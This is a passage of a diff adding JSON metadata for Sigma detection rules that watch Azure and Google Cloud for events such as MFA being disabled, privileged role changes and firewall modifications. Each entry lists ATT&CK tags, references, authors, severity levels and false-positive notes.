+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service account is modified or deleted.", + "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", + "value": "Azure Kubernetes Service Account Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Alert on when legecy authentication has been used on an account", + "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", + "value": "Use of Legacy Authentication Protocols", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2022/06/17", + "filename": "azure_legacy_authentication_protocols.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "User has been put in acception group so they can use legacy authentication" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect failed attempts to sign in to disabled accounts.", + "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", + "value": "Login to Disabled Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/10/10", + "filename": "azure_login_to_disabled_account.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", + "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", + "value": "Multifactor Authentication Denied", + "meta": { + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ], + "creation_date": "2022/03/24", + "filename": "azure_mfa_denies.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Users actually login but miss-click into the Deny button when MFA prompt." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", + "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", + "value": "Disabled MFA to Bypass Authentication Mechanisms", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1556/", + "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ], + "creation_date": "2022/02/08", + "filename": "azure_mfa_disabled.yml", + "author": "@ionsor", + "level": "medium", + "falsepositive": [ + "Authorized modification by administrators" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", + "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", + "value": "Multifactor Authentication Interrupted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ], + "creation_date": "2021/10/10", + "filename": "azure_mfa_interrupted.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Firewall Policy is Modified or Deleted.", + "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", + "value": "Azure Network Firewall Policy Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/02", + "filename": "azure_network_firewall_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", + "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", + "value": "Azure Firewall Rule Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_firewall_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", + "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", + "value": "Azure Point-to-site VPN Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a network security configuration is modified or deleted.", + "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", + "value": "Azure Network Security Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_security_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Network Security Configuration being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", + "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", + "value": "Azure Virtual Network Device Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_virtual_device_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a new cloudshell is created inside of Azure portal.", + "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", + "value": "Azure New CloudShell Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/09/21", + "filename": "azure_new_cloudshell_created.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "A new cloudshell may be created by a system administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a owner is was removed from a application or service principal in Azure.", + "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", + "value": "Azure Owner Removed From Application or Service Principal", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_owner_removed_from_application_or_service_principal.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Owner being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", + "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", + "value": "PIM Approvals And Deny Elevation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_activation_approve_deny.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Actual admin using PIM." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when PIM alerts are set to disabled.", + "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", + "value": "PIM Alert Setting Changes To Disabled", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1484" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_alerts_disabled.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Administrator disabling PIM alerts as an active choice." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when changes are made to PIM roles", + "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", + "value": "Changes To PIM Settings", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_change_settings.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legit administrative PIM setting configuration changes" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user is added to a privileged role.", + "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", + "value": "User Added To Privilege Role", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/06", + "filename": "azure_priviledged_role_assignment_add.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legtimate administrator actions of adding members from a role" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user is removed from a privileged role. 
Bulk changes should be investigated.", + "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", + "value": "Bulk Deletion Changes To Privileged Account Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/05", + "filename": "azure_priviledged_role_assignment_bulk_change.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legtimate administrator actions of removing members from a role" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a new admin is created.", + "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", + "value": "Privileged Account Creation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_privileged_account_creation.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", + "level": "medium", + "falsepositive": [ + "A legitimate new admin account being created" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "uuid": 
"c1182e02-49a3-481c-b3de-0fadc4091488", + "value": "Rare Subscription-level Operations In Azure", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" + ], + "tags": [ + "attack.t1003" + ], + "creation_date": "2020/05/07", + "filename": "azure_rare_operations.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service principal is created in Azure.", + "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", + "value": "Azure Service Principal Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/02", + "filename": "azure_service_principal_created.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service principal being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service principal was removed in Azure.", + "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", + "value": "Azure Service Principal Removed", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_service_principal_removed.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service principal being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", + "value": "Azure Subscription Permission Elevation Via ActivityLogs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", + "value": "Azure Subscription Permission Elevation Via AuditLogs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a suppression rule is created in Azure. 
Adversary's could attempt this to evade detection.", + "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", + "value": "Azure Suppression Rule Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_suppression_rule_created.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Suppression Rule being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a temporary access pass (TAP) is added to an account. 
TAPs added to priv accounts should be investigated", + "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", + "value": "Temporary Access Pass Added To An Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/10", + "filename": "azure_tap_added.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Administrator adding a legitmate temporary access pass" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when there is a interruption in the authentication process.", + "uuid": "8366030e-7216-476b-9927-271d79f13cf3", + "value": "Azure Unusual Authentication Interruption", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_unusual_authentication_interruption.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", + "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", + "value": "Users Authenticating To Other Azure AD Tenants", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/06/30", + "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights\u2248 of unauthorizeed login to valid accounts.\n", + "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", + "value": "User Access Blocked by Azure Conditional Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2021/10/10", + "filename": "azure_user_login_blocked_by_conditional_access.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when a user has reset their password in Azure AD", + "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", + "value": "Password Reset By User Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" + ], + "tags": [ + 
"attack.t1078" + ], + "creation_date": "2022/08/03", + "filename": "azure_user_password_change.yml", + "author": "YochanaHenderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator or confirmed user action." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Virtual Network is modified or deleted in Azure.", + "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", + "value": "Azure Virtual Network Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_virtual_network_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a VPN connection is modified or deleted.", + "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", + "value": "Azure VPN Connection Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_vpn_connection_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when storage bucket is enumerated in Google Cloud.", + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration", + "meta": { + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2021/08/14", + "filename": "gcp_bucket_enumeration.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Storage Buckets being enumerated may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/14", + "filename": "gcp_bucket_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information", + "meta": { + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ], + "creation_date": "2021/08/15", + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/15", + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + 
